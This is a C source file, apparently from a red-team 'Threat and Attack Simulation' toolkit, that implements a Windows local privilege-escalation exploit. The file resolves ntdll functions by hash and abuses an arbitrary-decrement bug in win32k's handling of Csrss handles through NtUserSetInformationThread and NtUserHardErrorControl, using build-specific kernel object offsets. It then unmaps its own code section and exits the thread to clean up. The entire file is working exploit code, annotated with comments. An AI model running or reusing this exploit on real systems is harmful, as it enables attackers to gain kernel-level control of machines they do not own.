/*!
*
* Exploit
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation
*
!*/
#include "Common.h"
typedef struct
{
    /* ntdll routines used by ExploitFunction. Every member is filled in at
     * runtime by PeGetFuncEat() against the ntdll image located with
     * PebGetModule() (keys are the H_API_* / H_LIB_NTDLL values below). */
    D_API( NtUnmapViewOfSection );  /* target of the rewritten CONTEXT: unmaps the section holding this code */
    D_API( RtlExitUserThread );     /* planted as the fake return address so the thread exits afterwards */
    D_API( RtlCaptureContext );     /* captures the CONTEXT that is then rewritten */
    D_API( NtOpenThread );          /* opens the chain thread by CLIENT_ID */
    D_API( NtContinue );            /* applies the rewritten CONTEXT */
    D_API( NtClose );               /* closes the thread handle */
} API ;
/* Lookup keys handed to PebGetModule() (H_LIB_NTDLL) and PeGetFuncEat()
 * (H_API_*) in ExploitFunction. Each value stands for the module or export
 * named in its trailing comment. The hashing routine itself is not visible
 * in this file (presumably in Common.h), so any new key must be produced
 * with that same routine or the lookup will not find the export. */
#define H_API_NTUNMAPVIEWOFSECTION 0x6aa412cd /* NtUnmapViewOfSection */
#define H_API_RTLEXITUSERTHREAD 0x2f6db5e8 /* RtlExitUserThread */
#define H_API_RTLCAPTURECONTEXT 0xeba8d910 /* RtlCaptureContext */
#define H_API_NTOPENTHREAD 0x968e0cb1 /* NtOpenThread */
#define H_API_NTCONTINUE 0xfc3a6c2c /* NtContinue */
#define H_API_NTCLOSE 0x40d6e69d /* NtClose */
#define H_LIB_NTDLL 0x1edab0ed /* ntdll.dll */
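/*!
 *
 * Purpose:
 *
 * Leverages an arbitrary decrement bug in the way
 * win32k accepts handles from Csrss to elevate
 * the initial exploit chain thread to KernelMode.
 *
 * Runs as a thread start routine; Parameter is unused. The
 * routine resolves the ntdll exports it needs by hash, opens
 * the chain thread recorded in the shared TABLE, issues the
 * NtUserSetInformationThread / NtUserHardErrorControl pair with
 * a restore pointer derived from that thread's kernel object,
 * and finally rewrites its own CONTEXT so that the section
 * holding this code is unmapped and the thread exits.
 *
 * x64 only: the teardown writes Rsp/Rip/Rcx/Rdx directly.
 *
 * Returns: nothing. Once NtContinue succeeds control does not
 * come back here. The only early return is when ntdll, or one
 * of the exports in API, cannot be resolved; in that case the
 * routine touches nothing and simply returns to its caller
 * instead of calling through a NULL pointer.
 *
 !*/
D_SEC( D ) VOID WINAPI ExploitFunction( _In_ PVOID Parameter )
{
    API                 Api;
    CONTEXT             Ctx;
    CLIENT_ID           Cid;
    OBJECT_ATTRIBUTES   Att;
    DESKTOPUSEDESKTOP   Use;
    LPVOID              Ntd = NULL;
    LPVOID              Obj = NULL;
    LPVOID              Thd = NULL;

    RtlSecureZeroMemory( &Api, sizeof( Api ) );
    RtlSecureZeroMemory( &Ctx, sizeof( Ctx ) );
    RtlSecureZeroMemory( &Cid, sizeof( Cid ) );
    RtlSecureZeroMemory( &Att, sizeof( Att ) );
    RtlSecureZeroMemory( &Use, sizeof( Use ) );

    /* ntdll is located once; every export below is taken from that image */
    Ntd = PebGetModule( H_LIB_NTDLL );
    if ( Ntd == NULL ) {
        return;
    };

    Api.NtUnmapViewOfSection = PeGetFuncEat( Ntd, H_API_NTUNMAPVIEWOFSECTION );
    Api.RtlExitUserThread    = PeGetFuncEat( Ntd, H_API_RTLEXITUSERTHREAD );
    Api.RtlCaptureContext    = PeGetFuncEat( Ntd, H_API_RTLCAPTURECONTEXT );
    Api.NtOpenThread         = PeGetFuncEat( Ntd, H_API_NTOPENTHREAD );
    Api.NtContinue           = PeGetFuncEat( Ntd, H_API_NTCONTINUE );
    Api.NtClose              = PeGetFuncEat( Ntd, H_API_NTCLOSE );

    /* Every step below calls through these pointers. A lookup that failed
     * (stale hash, unexpected ntdll build) must not become a call through
     * NULL, so bail out before anything is touched. */
    if ( Api.NtUnmapViewOfSection == NULL || Api.RtlExitUserThread == NULL ||
         Api.RtlCaptureContext    == NULL || Api.NtOpenThread      == NULL ||
         Api.NtContinue           == NULL || Api.NtClose           == NULL )
    {
        return;
    };

    /* Open the chain thread recorded in the shared TABLE with full access */
    InitializeObjectAttributes( &Att, NULL, 0, NULL, NULL );
    Cid.UniqueThread  = ( ( PTABLE ) G_PTR( Table ) )->ThreadId;
    Cid.UniqueProcess = ( ( PTABLE ) G_PTR( Table ) )->ProcessId;

    if ( NT_SUCCESS( Api.NtOpenThread( &Thd, THREAD_ALL_ACCESS, &Att, &Cid ) ) ) {
        /* Kernel address of the thread object behind the handle */
        if ( ( Obj = KernelObjectAddress( Thd ) ) != NULL ) {
            /* Use is still all-zero at this point: the first call is issued
             * before the restore pointer is filled in. */
            if ( NT_SUCCESS( NtUserSetInformationThreadCall( NtCurrentThread(), UserThreadUseDesktop, &Use, sizeof( Use ) ) ) ) {
                /* Build-dependent offset into the thread object: 0x232 on
                 * build 9200 and later (9200 is the Windows 8 RTM build -
                 * confirm), 0x1f6 before, then +0x30. Which field this lands
                 * on is not visible in this file; per the header comment it
                 * is presumably the location the win32k decrement hits. */
                if ( NtCurrentPeb()->OSBuildNumber >= 9200 ) {
                    Use.Restore.pDeskRestore = C_PTR( U_PTR( U_PTR( Obj ) + 0x232 ) + 0x30 );
                } else {
                    Use.Restore.pDeskRestore = C_PTR( U_PTR( U_PTR( Obj ) + 0x1f6 ) + 0x30 );
                };
                /* Result is not checked; the teardown below runs either way */
                NtUserHardErrorControlCall( HardErrorDetachNoQueue, NtCurrentThread(), &Use.Restore );
            };
        };
        /* Closed whether or not the steps above succeeded */
        Api.NtClose( Thd );
    };

    /* Teardown: capture this thread's context and rewrite it so that
     * NtContinue lands in NtUnmapViewOfSection( NtCurrentProcess(),
     * ExploitFunction ) with RtlExitUserThread planted as the return
     * address. The net effect is that the section containing this
     * routine is unmapped and the thread then exits, without ever
     * returning into the unmapped code. */
    Ctx.ContextFlags = CONTEXT_FULL;
    Api.RtlCaptureContext( &Ctx );

    /* Page-aligned stack one page below the current one, presumably so
     * the fake frame does not overlap this routine's live locals. */
    Ctx.Rsp = ( ( Ctx.Rsp &~ ( 0x1000 - 1 ) ) - 0x1000 );
    Ctx.Rip = U_PTR( Api.NtUnmapViewOfSection );
    Ctx.Rcx = U_PTR( NtCurrentProcess() );        /* 1st x64 argument: ProcessHandle */
    Ctx.Rdx = U_PTR( G_PTR( ExploitFunction ) );  /* 2nd x64 argument: BaseAddress inside this section */
    *( ULONG_PTR * )( Ctx.Rsp + 0x0 ) = U_PTR( Api.RtlExitUserThread );

    /* Re-asserted after the capture so the full register set is restored */
    Ctx.ContextFlags = CONTEXT_FULL;
    Api.NtContinue( &Ctx, FALSE );
};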